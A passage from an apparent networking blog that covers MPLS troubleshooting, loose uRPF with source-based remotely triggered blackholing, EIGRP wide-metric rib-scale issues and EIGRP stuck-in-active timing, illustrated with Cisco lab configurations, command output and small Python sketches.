Voila! OSPF RIB entry and LDP bindings are both created, so LSP is functional again:
P#show mpls forwarding-table 192.168.23.2 32 detail
Local Outgoing Prefix Bytes Label Outgoing Next Hop
Label Label or Tunnel Id Switched interface
17 Pop Label 192.168.23.2/32 252 Fa0/1 192.168.23.2
MAC/Encaps=14/14, MRU=1504, Label Stack{}
CA020BDF0006CA030BFB00068847
No output feature configured
PE2#traceroute 192.168.23.2 source lo 0
Type escape sequence to abort.
Tracing the route to 192.168.23.2
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.34.3 [MPLS: Label 17 Exp 0] 4 msec 16 msec 8 msec
2 192.168.23.2 12 msec 32 msec 28 msec
Conclusion
In this article we’ve discussed several aspects of generic MPLS setup: PHP operation, loopback misconfig with OSPF, consequences of such a mischief as well as CCIE lab maniac scenario. I hope you’ve enjoyed it, so stay tuned for more!
There are quite a few articles in the wild explaining the Unicast Reverse Path Forwarding (uRPF) feature and its two modes: strict and loose. Although the operational difference between the two modes is the primary focus of such posts, they rarely cover why these two flavours exist in the first place, at least judging by a Google search for “loose vs strict uRPF”. Today I’d like to close this gap and highlight the connection between loose uRPF and a feature yet to be named.
Before we start discussing the modes, a quick recap is in order. RPF is a feature from the multicast world that prevents loops in the data plane: it compares the source address of IP packet to the RIB; if the ingress interface matches the route towards the source address, packet is forwarded further, otherwise it’s a loop and the packet is discarded. Unicast RPF stems from the same idea – verify that the packet comes from a valid direction. Strict uRPF operates in the same way as its counterpart from the multicast feature set; loose uRPF, however, does not check the interface – just the availability of a valid route. There is a single notable exception to such a description though: if next-hop interface for the source address is Null0, the packet is also discarded. Cisco provides the use case for the feature as well:
To provide ISPs with a DDoS resistance tool on the ISP-to-ISP edge of a network, Unicast RPF was modified from its original strict mode implementation to check the source addresses of each ingress packet without regard for the specific interface on which it was received. This modification is known as “loose mode.”
Does the ISP-to-ISP DDoS protection sound familiar? It is indeed part of the Remotely Triggered Blackhole (RTBH). The destination-based RTBH uses BGP communities to notify ISP which destination is under attack, so that the ISP can temporarily drop offending traffic. Obviously, the legitimate traffic is discarded too in such a case. Wouldn’t it be better if the traffic could be dropped based on the offending source IP? This is exactly the use case for the source-based RTBH: if loose uRPF is added to the destination-based RTBH setup, attacker’s IP address can be marked by BGP community and further forwarded to the void. Here is a nice article on the RTBH that explains the solution, using IOS XR platform.
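The difference between the two modes, including the Null0 exception that source-based RTBH relies on, fits into a short sketch. The RIB below is hypothetical and so are the function names; it is a model of the checks described above rather than of any particular platform.

```python
import ipaddress

# Hypothetical RIB of an edge router: (prefix, egress interface).
RIB = [
    ("3.3.3.3/32", "Fa1/0"),
    ("4.4.4.4/32", "Fa0/0"),
    ("5.5.5.5/32", "Null0"),   # source marked for blackholing
]


def lookup(rib, address):
    """Longest-prefix match; returns (network, interface) or None."""
    addr = ipaddress.ip_address(address)
    matches = [
        (ipaddress.ip_network(prefix), interface)
        for prefix, interface in rib
        if addr in ipaddress.ip_network(prefix)
    ]
    if not matches:
        return None
    return max(matches, key=lambda match: match[0].prefixlen)


def urpf_pass(rib, source, ingress, mode):
    """Return True if a packet from source arriving on ingress is accepted."""
    route = lookup(rib, source)
    if route is None:
        return False                 # no route back to the source at all
    egress = route[1]
    if egress == "Null0":
        return False                 # route exists but points to the void
    if mode == "strict":
        return egress == ingress     # must arrive on the interface towards the source
    return True                      # loose: any valid route is enough


print(urpf_pass(RIB, "4.4.4.4", "Fa0/0", "strict"))
print(urpf_pass(RIB, "4.4.4.4", "Fa0/1", "strict"))
print(urpf_pass(RIB, "4.4.4.4", "Fa0/1", "loose"))
print(urpf_pass(RIB, "5.5.5.5", "Fa0/1", "loose"))
```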
Disclaimer: there will be no extra revelations further down the text, so if you already grasped the idea, feel free to skip the rest of the post.
Let’s build a simple topology to verify the loose uRPF within the RTBH feature:
ISP network consists of 2 PE routers that are using the same BGP AS. CE1 and CE2 are customer routers that peer with ISP using eBGP. Important note: IOS XE requires that a directly connected eBGP neighbour and its prefixes are reachable via the same physical egress interface, otherwise, the received routes are considered inaccessible. The workaround is simple though – disable-connected-check on PE, that performs next-hop replacement. Here is the basic routing and addressing config:
CE1#show run | section interface|router|ip route
interface Loopback0
ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
ip address 192.168.13.3 255.255.255.0
router bgp 3
bgp router-id 3.3.3.3
no bgp default ipv4-unicast
neighbor 192.168.13.1 remote-as 12
address-family ipv4
network 3.3.3.3 mask 255.255.255.255
neighbor 192.168.13.1 activate
neighbor 192.168.13.1 send-community both
CE2#show run | section interface|router
interface Loopback0
ip address 4.4.4.4 255.255.255.255
interface FastEthernet0/0
ip address 192.168.24.4 255.255.255.0
router bgp 4
bgp router-id 4.4.4.4
no bgp default ipv4-unicast
neighbor 192.168.24.2 remote-as 12
address-family ipv4
network 4.4.4.4 mask 255.255.255.255
neighbor 192.168.24.2 activate
neighbor 192.168.24.2 send-community both
PE1#show run | section interface|router
interface Loopback0
ip address 1.1.1.1 255.255.255.255
ip ospf 1 area 0
interface FastEthernet0/0
ip address 192.168.13.1 255.255.255.0
interface FastEthernet1/0
ip address 192.168.12.1 255.255.255.0
ip ospf 1 area 0
router ospf 1
router-id 1.1.1.1
router bgp 12
bgp router-id 1.1.1.1
no bgp default ipv4-unicast
neighbor 2.2.2.2 remote-as 12
neighbor 2.2.2.2 update-source Loopback0
neighbor 192.168.13.3 remote-as 3
neighbor 192.168.13.3 disable-connected-check
!
address-family ipv4
redistribute connected
neighbor 2.2.2.2 activate
neighbor 2.2.2.2 send-community both
neighbor 192.168.13.3 activate
neighbor 192.168.13.3 send-community both
PE2#show run | section interface|router
interface Loopback0
ip address 2.2.2.2 255.255.255.255
ip ospf 1 area 0
interface FastEthernet0/0
ip address 192.168.24.2 255.255.255.0
interface FastEthernet0/1
ip address 192.168.25.2 255.255.255.0
interface FastEthernet1/0
ip address 192.168.12.2 255.255.255.0
ip ospf 1 area 0
router ospf 1
router-id 2.2.2.2
router bgp 12
bgp router-id 2.2.2.2
no bgp default ipv4-unicast
neighbor 1.1.1.1 remote-as 12
neighbor 1.1.1.1 update-source Loopback0
neighbor 192.168.24.4 remote-as 4
neighbor 192.168.25.5 remote-as 5
!
address-family ipv4
redistribute connected
neighbor 1.1.1.1 activate
neighbor 1.1.1.1 send-community
neighbor 192.168.24.4 activate
neighbor 192.168.24.4 send-community both
neighbor 192.168.25.5 activate
neighbor 192.168.25.5 send-community both
Attacker#show run | section interface|router
interface Loopback0
ip address 5.5.5.5 255.255.255.255
interface FastEthernet0/1
ip address 192.168.25.5 255.255.255.0
router bgp 5
bgp router-id 5.5.5.5
no bgp default ipv4-unicast
neighbor 192.168.25.2 remote-as 12
address-family ipv4
network 5.5.5.5 mask 255.255.255.255
neighbor 192.168.25.2 activate
neighbor 192.168.25.2 send-community both
First, let’s implement destination-based RTBH. Community of 12:666 would be the marker to discard the traffic through Null0.
PE1#show run | s ip route|ip community|ip bgp|route-map|router bgp
router bgp 12
address-family ipv4
neighbor 192.168.13.3 route-map RTBH in
ip bgp-community new-format
ip community-list standard RTBH permit 12:666
ip route 10.0.0.0 255.255.255.255 Null0
route-map RTBH permit 10
match community RTBH
set local-preference 200
set ip next-hop 10.0.0.0
route-map RTBH permit 20
PE2#show run | s ip route|ip community|ip bgp|route-map|router bgp
router bgp 12
address-family ipv4
neighbor 192.168.24.4 route-map RTBH in
neighbor 192.168.25.5 route-map RTBH in
ip bgp-community new-format
ip community-list standard RTBH permit 12:666
ip route 10.0.0.0 255.255.255.255 Null0
route-map RTBH permit 10
match community RTBH
set local-preference 200
set ip next-hop 10.0.0.0
route-map RTBH permit 20
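The route-map logic above can be sketched in a few lines of Python. This is only an illustrative model, not how IOS implements it: the `Route` class and `apply_rtbh_route_map` function are hypothetical names, and the sample next hops are made up for the example.

```python
from dataclasses import dataclass, field

RTBH_COMMUNITY = "12:666"
BLACKHOLE_NEXT_HOP = "10.0.0.0"  # resolves to Null0 through the static route


@dataclass
class Route:
    prefix: str
    next_hop: str
    local_pref: int = 100
    communities: set = field(default_factory=set)


def apply_rtbh_route_map(route: Route) -> Route:
    """Hypothetical model of 'route-map RTBH' sequences 10 and 20."""
    if RTBH_COMMUNITY in route.communities:
        # permit 10: community matches, so rewrite local preference and next hop
        return Route(route.prefix, BLACKHOLE_NEXT_HOP, 200, set(route.communities))
    # permit 20: everything else is accepted unchanged
    return route


# Sample routes; the original next hops are illustrative assumptions.
tagged = apply_rtbh_route_map(Route("3.3.3.3/32", "192.168.13.3", communities={"12:666"}))
plain = apply_rtbh_route_map(Route("4.4.4.4/32", "192.168.24.4"))
print(tagged.next_hop, tagged.local_pref)  # 10.0.0.0 200
print(plain.next_hop, plain.local_pref)    # 192.168.24.4 100
```

The empty `permit 20` sequence matters: without it, every route lacking the community would be denied by the implicit deny at the end of the route-map.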
Attacker has initiated the DDoS attack on CE1 3.3.3.3/32:
Attacker#ping 3.3.3.3 source loopback0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 40/48/52 ms
In order to block the offending traffic, CE1 has to announce 3.3.3.3/32 with community of 12:666.
CE1#show run | section route-map|router bgp
router bgp 3
address-family ipv4
network 3.3.3.3 mask 255.255.255.255 route-map RTBH
route-map RTBH permit 10
set community 12:666
The attack has ceased on PE2 due to the data plane filter:
Attacker#ping 3.3.3.3 source loopback0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5
UUUUU
Success rate is 0 percent (0/5)
The important feature of RTBH – traffic is discarded as soon as possible on provider edge, thus limiting the impact on the ISP network.
PE2#show ip bgp 3.3.3.3/32
BGP routing table entry for 3.3.3.3/32, version 27
Paths: (1 available, best #1, table default)
Advertised to update-groups:
3
Refresh Epoch 2
3
10.0.0.0 from 1.1.1.1 (1.1.1.1)
Origin IGP, metric 0, localpref 200, valid, internal, best
Community: 12:666
PE2#
PE2#show ip cef 3.3.3.3/32 det
3.3.3.3/32, epoch 0, flags rib only nolabel, rib defined all labels
recursive via 10.0.0.0
attached to Null0
There is an unfortunate side effect though – CE2 has lost connectivity as well:
CE2#ping 3.3.3.3 source loopback 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 4.4.4.4
UUUUU
Success rate is 0 percent (0/5)
Destination-based RTBH might be a good tool to limit the impact of a DDoS attack while you gather additional information about the attacker. Let’s assume that CE1 already knows the source IP address – 5.5.5.5/32. Time to introduce source-based RTBH with the addition of loose uRPF!
PE1#show run int f0/0
interface FastEthernet0/0
ip verify unicast source reachable-via any
PE2#show run int f0/0
interface FastEthernet0/0
ip verify unicast source reachable-via any
PE2#show run int f0/1
interface FastEthernet0/1
ip verify unicast source reachable-via any
ISP is set up, so let’s swap the announcements on CE1 to trigger source-based RTBH:
CE1#show run | s ip route|router bgp
router bgp 3
address-family ipv4
network 3.3.3.3 mask 255.255.255.255
network 5.5.5.5 mask 255.255.255.255 route-map RTBH
ip route 5.5.5.5 255.255.255.255 Null0
ISP is filtering the traffic from attacker on the entry points to its network:
PE2#show ip bgp 5.5.5.5/32
BGP routing table entry for 5.5.5.5/32, version 29
Paths: (2 available, best #1, table default)
Advertised to update-groups:
3
Refresh Epoch 3
3
10.0.0.0 from 1.1.1.1 (1.1.1.1)
Origin IGP, metric 0, localpref 200, valid, internal, best
Community: 12:666
Refresh Epoch 4
5
192.168.25.5 from 192.168.25.5 (5.5.5.5)
Origin IGP, metric 0, localpref 100, valid, external
PE2#
PE2#show ip cef 5.5.5.5/32 det
5.5.5.5/32, epoch 0, flags rib only nolabel, rib defined all labels
recursive via 10.0.0.0
attached to Null0
This time, however, only the offending party is neutralized, valid connections are still operational:
CE2#ping 3.3.3.3 so lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 4.4.4.4
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 44/53/72 ms
Attacker#ping 3.3.3.3 source loopback0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5
.....
Success rate is 0 percent (0/5)
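The combination of loose uRPF and a Null0 route can be modelled as a source lookup followed by a simple check. The sketch below is an assumption-laden illustration: the `FIB` table, the `lookup` and `loose_urpf_permits` helpers and the non-Null0 next hops are hypothetical, and real CEF lookups are considerably more involved.

```python
import ipaddress

# Hypothetical FIB on PE2 after source-based RTBH is triggered.
# Only the Null0 entry is taken from the output above; other next hops are illustrative.
FIB = {
    ipaddress.ip_network("3.3.3.3/32"): "192.168.12.1",
    ipaddress.ip_network("4.4.4.4/32"): "192.168.24.4",
    ipaddress.ip_network("5.5.5.5/32"): "Null0",
}


def lookup(address):
    """Longest-prefix match; returns the next hop or None when no route exists."""
    addr = ipaddress.ip_address(address)
    matches = [net for net in FIB if addr in net]
    if not matches:
        return None
    best = max(matches, key=lambda net: net.prefixlen)
    return FIB[best]


def loose_urpf_permits(source):
    """Loose mode: the source must be reachable via any interface, and not via Null0."""
    result = lookup(source)
    return result is not None and result != "Null0"


print(loose_urpf_permits("4.4.4.4"))  # True: CE2 traffic passes
print(loose_urpf_permits("5.5.5.5"))  # False: source resolves to Null0
print(loose_urpf_permits("9.9.9.9"))  # False: no route to the source at all
```

The check looks only at the source address, which is why traffic from 4.4.4.4 towards 3.3.3.3 keeps flowing while packets from 5.5.5.5 are dropped at the edge.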
In production you would probably not allow customers to announce prefixes in such a direct way; one would rather restrict the allowed prefixes or even use a dedicated router within the ISP to generate the prefixes for RTBH. Nevertheless, the underlying idea of loose uRPF combined with a static route to Null0 stays the same, so I hope this post bridges the gap between the uRPF mode and its use case.
Let’s imagine that you’ve got an unstoppable urge to upgrade your network software to the latest available version as well as to adopt all the best practices available (you’re not looking for a new job just yet). Your first guinea pig is EIGRP in classic mode – you can’t wait to bump it to named mode because of all the shiny new features. Even better, you can do it with just a single eigrp upgrade-cli command – couldn’t be easier, what could possibly go wrong? As you might have guessed from my previous posts, such an upgrade could wreck your network in certain circumstances.
What could be simpler than four routers? Exactly, three routers! Each of them is running EIGRP, R1 & R3 – classic mode, while R2 has just finished upgrading to named mode.
R1#show run | section router eigrp|interface
interface Loopback0
ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.1 255.255.255.0
router eigrp 1
network 0.0.0.0
R3#show run | section router eigrp|interface
interface Loopback0
ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/1
ip address 192.168.23.3 255.255.255.0
router eigrp 1
network 0.0.0.0
R2#show run | section router eigrp|interface
interface Loopback0
ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.2 255.255.255.0
interface FastEthernet0/1
ip address 192.168.23.2 255.255.255.0
router eigrp NAMED
address-family ipv4 unicast autonomous-system 1
network 0.0.0.0
As you probably expect, there is nothing criminal just yet, R3 is still able to reach R1 without hiccups:
R3#show ip route eigrp
<output omitted>
1.0.0.0/32 is subnetted, 1 subnets
D 1.1.1.1 [90/158720] via 192.168.23.2, 00:03:32, FastEthernet0/1
2.0.0.0/32 is subnetted, 1 subnets
D 2.2.2.2 [90/28160] via 192.168.23.2, 00:03:37, FastEthernet0/1
D 192.168.12.0/24 [90/30720] via 192.168.23.2, 00:03:37, FastEthernet0/1
R3#
R3#ping 1.1.1.1 source lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 3.3.3.3
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 20/28/36 ms
So far so good, isn’t it? However, just as you are preparing to hit upgrade-cli on yet another router, a request comes in to deprioritize 1.1.1.1/32 for some kind of traffic engineering. You want it out of your way ASAP, so you adjust the bandwidth on the loopback:
R1(config)# interface lo0
R1(config-if)# bandwidth ?
<1-10000000> Bandwidth in kilobits
inherit Specify how bandwidth is inherited
qos-reference Reference bandwidth for QOS test
receive Specify receive-side bandwidth
R1(config-if)# bandwidth 1
KABOOM! R3 has just lost its connectivity to R1:
R3#ping 1.1.1.1 so lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 3.3.3.3
UUUUU
Success rate is 0 percent (0/5)
R3#
R3#show ip route eigrp
<output omitted>
1.0.0.0/32 is subnetted, 1 subnets
D 1.1.1.1 [90/2560133120] via 192.168.23.2, 00:00:56, FastEthernet0/1
2.0.0.0/32 is subnetted, 1 subnets
D 2.2.2.2 [90/28160] via 192.168.23.2, 00:09:42, FastEthernet0/1
D 192.168.12.0/24 [90/30720] via 192.168.23.2, 00:09:42, FastEthernet0/1
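The jump in R3's metric can be reproduced with the classic EIGRP formula under default K values (K1 = K3 = 1). This is a rough sketch: the `classic_metric` helper is a hypothetical name, the total delay of 5200 microseconds is the value R3's topology table reports for this prefix, and the 100000 kbit/s figure assumes FastEthernet is the slowest link before the change.

```python
def classic_metric(min_bandwidth_kbit, total_delay_usec):
    """Classic 32-bit EIGRP composite metric with default K values."""
    bandwidth_term = 10**7 // min_bandwidth_kbit  # inverse of the slowest link
    delay_term = total_delay_usec // 10           # delay in tens of microseconds
    return 256 * (bandwidth_term + delay_term)


# Before the change: the slowest link is assumed to be FastEthernet (100000 kbit/s).
print(classic_metric(100_000, 5200))  # 158720
# After 'bandwidth 1' on R1's loopback the minimum bandwidth drops to 1 kbit/s.
print(classic_metric(1, 5200))        # 2560133120
```

Note that 2560133120 is still below 4294967295, so on a classic-mode router the worsened metric fits into a 32-bit value.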
EIGRP must be the culprit; however, the route is still in the RIB, with a worse metric as expected.
R3#traceroute 1.1.1.1 source lo0 numeric
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.23.2 12 msec 16 msec 16 msec
2 192.168.23.2 !H !H !H
R2, on the other hand, ignores your efforts to squeeze the traffic through it, because…
R2#show ip route eigrp
<output omitted>
3.0.0.0/32 is subnetted, 1 subnets
D 3.3.3.3 [90/2662400] via 192.168.23.3, 00:14:07, FastEthernet0/1
It has lost the route!
However, the loss is not as complete as it may look. The prefix is still in the EIGRP topology table with perfectly valid metrics:
R2#show ip eigrp topology 1.1.1.1/32
EIGRP-IPv4 VR(NAMED) Topology Entry for AS(1)/ID(2.2.2.2) for 1.1.1.1/32
State is Passive, Query origin flag is 1, 0 Successor(s), FD is Infinity, RIB is 4294967295
Descriptor Blocks:
192.168.12.1 (FastEthernet0/0), from 192.168.12.1, Send flag is 0x0
Composite metric is (655694233600/655687680000), route is Internal
Vector metric:
Minimum bandwidth is 1 Kbit
Total delay is 5100000000 picoseconds
Reliability is 255/255
Load is 1/255
Minimum MTU is 1500
Hop count is 1
Originating router is 1.1.1.1
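The composite metric in this output can be checked against the wide-metric formula from the EIGRP RFC (RFC 7868) with default K values. The sketch below is a simplified calculation, not R2's actual code path; `wide_metric` is a hypothetical helper, and the 5,000,000,000 picosecond figure for R1's own delay is inferred from the reported distance.

```python
EIGRP_BANDWIDTH = 10**7         # reference bandwidth in kbit/s
EIGRP_WIDE_SCALE = 65536        # scaling constant for wide metrics
EIGRP_DELAY_PICO = 10**6        # picoseconds per microsecond


def wide_metric(min_bandwidth_kbit, total_delay_ps, k1=1, k3=1):
    """64-bit wide composite metric with K2 = K4 = K5 = K6 = 0."""
    throughput = EIGRP_BANDWIDTH * EIGRP_WIDE_SCALE // min_bandwidth_kbit
    latency = total_delay_ps * EIGRP_WIDE_SCALE // EIGRP_DELAY_PICO
    return k1 * throughput + k3 * latency


# Composite metric as seen by R2: 1 kbit/s and 5,100,000,000 ps of total delay.
print(wide_metric(1, 5_100_000_000))  # 655694233600
# Reported distance from R1, assuming R1's own delay is 5,000,000,000 ps.
print(wide_metric(1, 5_000_000_000))  # 655687680000
```

Both values match the "Composite metric is (655694233600/655687680000)" line, and the throughput term alone (655360000000) already exceeds the 32-bit range.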
The data seems to be in order. So far we’ve got two mysteries on our hands:
Why has R2 lost its route?
Why has R3 NOT lost its route?
The first question directly affects availability, so we tackle this one first. Notice anything unusual about the EIGRP metric? It’s way bigger than 4294967295 (“RIB is 4294967295” in the output), which is the upper bound of the 32-bit RIB metric. EIGRP cannot squeeze its 64-bit wide metric into the 32-bit RIB metric, so the route is not installed. The solution? Scale down the EIGRP metric before putting it into the RIB by using metric rib-scale, which is equal to 128 by default:
R2#show ip protocols
Routing Protocol is "eigrp 1"
Outgoing update filter list for all interfaces is not set
Incoming update filter list for all interfaces is not set
Default networks flagged in outgoing updates
Default networks accepted from incoming updates
EIGRP-IPv4 VR(NAMED) Address-Family Protocol for AS(1)
Metric weight K1=1, K2=0, K3=1, K4=0, K5=0 K6=0
Metric rib-scale 128
Metric version 64bit
NSF-aware route hold timer is 240
Router-ID: 2.2.2.2
Topology : 0 (base)
Active Timer: 3 min
Distance: internal 90 external 170
Maximum path: 4
Maximum hopcount 100
Maximum metric variance 1
Total Prefix Count: 5
Total Redist Count: 0
Automatic Summarization: disabled
Maximum path: 4
Routing for Networks:
0.0.0.0
Routing Information Sources:
Gateway Distance Last Update
192.168.12.1 90 00:17:36
192.168.23.3 90 00:17:36
Distance: internal 90 external 170
Guess what? 128 is still not enough to bring 655694233600 down to a 32-bit number; 160 seems to do the trick though:
R2(config)#router eigrp NAMED
R2(config-router)#address-family ipv4 autonomous-system 1
R2(config-router-af)#metric rib-scale 160
R2#show ip route eigrp
<output omitted>
1.0.0.0/32 is subnetted, 1 subnets
D 1.1.1.1 [90/4098088960] via 192.168.12.1, 00:00:49, FastEthernet0/0
3.0.0.0/32 is subnetted, 1 subnets
D 3.3.3.3 [90/2129920] via 192.168.23.3, 00:00:49, FastEthernet0/1
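The arithmetic behind the rib-scale choice is easy to verify. The following sketch assumes that the RIB metric is the composite metric divided by rib-scale with integer division, that a usable result must stay below 4294967295, and that rib-scale accepts values from 1 to 255; `rib_metric` and `fits` are hypothetical helper names.

```python
RIB_METRIC_MAX = 4294967295  # 2**32 - 1, shown as "RIB is 4294967295"
composite = 655694233600     # composite metric from R2's topology table


def rib_metric(composite_metric, rib_scale):
    """Scale the 64-bit composite metric down for the RIB (integer division assumed)."""
    return composite_metric // rib_scale


def fits(composite_metric, rib_scale):
    """True when the scaled metric stays below the 32-bit ceiling."""
    return rib_metric(composite_metric, rib_scale) < RIB_METRIC_MAX


print(rib_metric(composite, 128), fits(composite, 128))  # 5122611200 False
print(rib_metric(composite, 160), fits(composite, 160))  # 4098088960 True

# Smallest scale in the assumed 1..255 range that makes this metric fit.
smallest = next(s for s in range(1, 256) if fits(composite, s))
print(smallest)  # 153
```

The value for scale 160 matches the metric of 4098088960 that R2 installs, and under these assumptions any scale from 153 upwards would have worked for this particular prefix.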
R3 is able to reach 1.1.1.1/32 again as well:
R3#ping 1.1.1.1 so lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 3.3.3.3
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 20/32/52 ms
So, the first mystery is declassified now. What about the second one: why on earth did R3 retain the route after R2 stopped using it? It’s not an idle question though: such behaviour is bound to confuse a troubleshooting engineer, who is led to believe that routing is still intact, since the proper route is installed in the RIB.
After an EIGRP router loses all of its successor routes, it runs a synchronization algorithm called DUAL. Our case is no exception, so let’s walk through the process between R2 and R3:
R2 loses the successor for 1.1.1.1/32, because it receives Query from R1, so R2 sends the Query of its own towards R3.
Notice the metric: delay corresponds to the actual value on R2 instead of Infinity constant.
R3 updates its topology with the received metric components:
R3#show ip eigrp topology 1.1.1.1/32
EIGRP-IPv4 Topology Entry for AS(1)/ID(3.3.3.3) for 1.1.1.1/32
State is Passive, Query origin flag is 1, 1 Successor(s), FD is 2560133120
Descriptor Blocks:
192.168.23.2 (FastEthernet0/1), from 192.168.23.2, Send flag is 0x0
Composite metric is (2560133120/2560130560), route is Internal
Vector metric:
Minimum bandwidth is 1 Kbit
Total delay is 5200 microseconds
Reliability is 255/255
Load is 1/255
Minimum MTU is 1500
Hop count is 2
Originating router is 1.1.1.1
Since R3 has no alternatives to R2 and thus no possible EIGRP neighbours to query further, it responds back with the Infinity metric due to split horizon rule:
R2 receives Replies to all outstanding Queries, so it is able to select the loop-free route. The only available one cannot squeeze into the RIB, so R2 is left with no route.
Fun fact: if you flap RIB scale config so that R2 loses the existing route, Query from R2 indicates route loss properly:
The reason for such a different processing seems to be simple: the initial Query is triggered by the Query from successor R1 before RIB update is attempted (no reason to specify Infinity metric); the second Query is performed after proper route loss from RIB perspective. The initial Query cannot trigger RIB update because routing information has to be updated via DUAL first. I reckon there could be two solutions to that:
either send Update with Infinity metric after the route fails to be installed in RIB or
always send Query with Infinity metric (which is the approach in EIGRP RFC).
Is it a likely failure scenario? Not really, modern networks make it difficult to end up with a metric high enough to get an out-of-bounds value. However, it’s still a valid scenario, especially in case of lousy metric engineering. The prevention is well-known – pilot testing and maintenance windows with automated predefined checks.
It’s very likely that you already know what EIGRP stuck-in-active (SIA) feature means. Just a quick recap: if a router does not get a Reply message for previously sent Query within Active timer (3 minutes by default), it tears down the adjacency with the “stuck” neighbour; in the meantime the router probes its neighbours with SIA-Query, resetting Active timer if there is SIA-Reply from the neighbour. Sounds simple, right? Just another failsafe to protect network from a router that might go haywire. Let me ask you a long multi-question though:
Why is SIA required, to the point that there is no way to disable it? Isn’t it enough to expire the Holddown timer on the stuck neighbour and consider its Reply unnecessary?
Well, the reply really depends on the viewpoint (Cisco’s “it depends”, uh-huh). Let’s look at an example:
In such a setup there is absolutely no way SIA would be needed. Let’s imagine that R3 stops sending EIGRP packets for some reason and 1.1.1.1/32 on R1 goes down:
R1 would send a Query for 1.1.1.1/32 to R2;
R2 would send a Query for 1.1.1.1/32 to R3, however, it will never get a Reply;
There would be a few unsuccessful EIGRP retransmits from R2 towards R3;
Either Holddown timer expires (15s by default) or number of retransmits reaches 16 (only Cisco knows how long);
R2 tears down neighbourship with R3 and sends Reply back to R1;
Active timer on R1 never comes even close to expiration (3 minutes) so the 1.1.1.1/32 in Active state is removed.
Remember, however, that EIGRP was designed a really long time ago, when serial links were ubiquitous. The most important feature of these links for this discussion is the relatively long distance and, as a result, high delay. Although serial links are actively being upgraded, there is still a similar kind of connection: radio links. Consider the following setup:
The only non-default thing is the serial link using Frame-Relay for encapsulation.
R1#sho run | s interface|router
interface Loopback0
ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.1 255.255.255.0
interface FastEthernet0/1
ip address 192.168.14.1 255.255.255.0
router eigrp 1
network 0.0.0.0
R2#show run | section interface|router
interface Loopback0
ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.2 255.255.255.0
interface Serial4/0
ip address 192.168.23.2 255.255.255.0
encapsulation frame-relay
no keepalive
frame-relay interface-dlci 100
router eigrp 1
network 0.0.0.0
R3#show run | section interface|router
interface Loopback0
ip address 3.3.3.3 255.255.255.255
interface Serial4/0
ip address 192.168.23.3 255.255.255.0
encapsulation frame-relay
no keepalive
frame-relay interface-dlci 100
router eigrp 1
network 0.0.0.0
Let’s try to run the scenario without SIA involved. The feature was introduced in the 12.1(5) release, so any 12.0 software should do. Although we cannot drop Queries specifically, we can discard all unicast packets to achieve the following: drop Queries and accept Hellos. As a result, R2 would consider R3 to have failed based on the Active timer (180 seconds by default) and not on the Holddown timer (also 180 seconds by default). Although it seems like a setup at first glance, I suggest holding on to it for some time.
R3#show ip access-lists
Extended IP access list NOUNICAST
10 permit ip any 224.0.0.0 15.255.255.255
20 deny ip any any
Now, let’s bring down 1.1.1.1/32 and activate the ACL on R3:
R3(config)#interface s4/0
R3(config-if)#ip access-group NOUNICAST in
R1(config)#interface lo0
R1(config-if)#sh
Now R1 considers the route to be in Active state.
R1# show ip eigrp topology active
IP-EIGRP Topology Table for AS(1)/ID(1.1.1.1)
Codes: P - Passive, A - Active, U - Update, Q - Query, R - Reply,
r - Reply status
A 1.1.1.1/32, 1 successors, FD is Infinity
1 replies, active 00:00:07, query-origin: Local origin
Remaining replies:
via 192.168.12.2, r, FastEthernet0/0
After 3 minutes R1 should flush the route because by that moment it has received no Reply from R2 as there was no response from R3. However, this is not the case:
R1#show ip eigrp topology active
IP-EIGRP Topology Table for AS(1)/ID(1.1.1.1)
Codes: P - Passive, A - Active, U - Update, Q - Query, R - Reply,
r - Reply status
A 1.1.1.1/32, 1 successors, FD is Inaccessible
1 replies, active 00:03:05, query-origin: Local origin
via Connected (Infinity/Infinity), Loopback0
Remaining replies:
via 192.168.12.2, r, FastEthernet0/0
R1#show ip eigrp topology active
IP-EIGRP Topology Table for AS(1)/ID(1.1.1.1)
Is there anything wrong with the configuration? I don’t think so. However, let’s get back to the failure condition based on the Active timer instead of the Holddown timer. Imagine that there are a bunch of other routers between R1 and R2, all using serial links and thus contributing to the overall delay. Could the gap between 1.1.1.1/32 going down (and starting the Active timer) and the last Hello from R3 arriving (refreshing the Holddown timer) be small enough to be covered completely by that delay? Definitely so:
Although R2 might terminate neighbourship with R3 after 180 seconds, there is still a propagation delay for that event to reach R1.
With a bit of “luck”, the last Hello and the disappearance of 1.1.1.1/32 would line up.
As soon as R2 prepares the Reply to be sent back to R1, Active timer on R1 expires and R1 resets the neighbourship with R2, at least according to the description of DUAL. As you could imagine, such a behaviour causes chain flapping of EIGRP neighbourships all around the network, just because there are high-delay links and a rogue malfunctioning router.
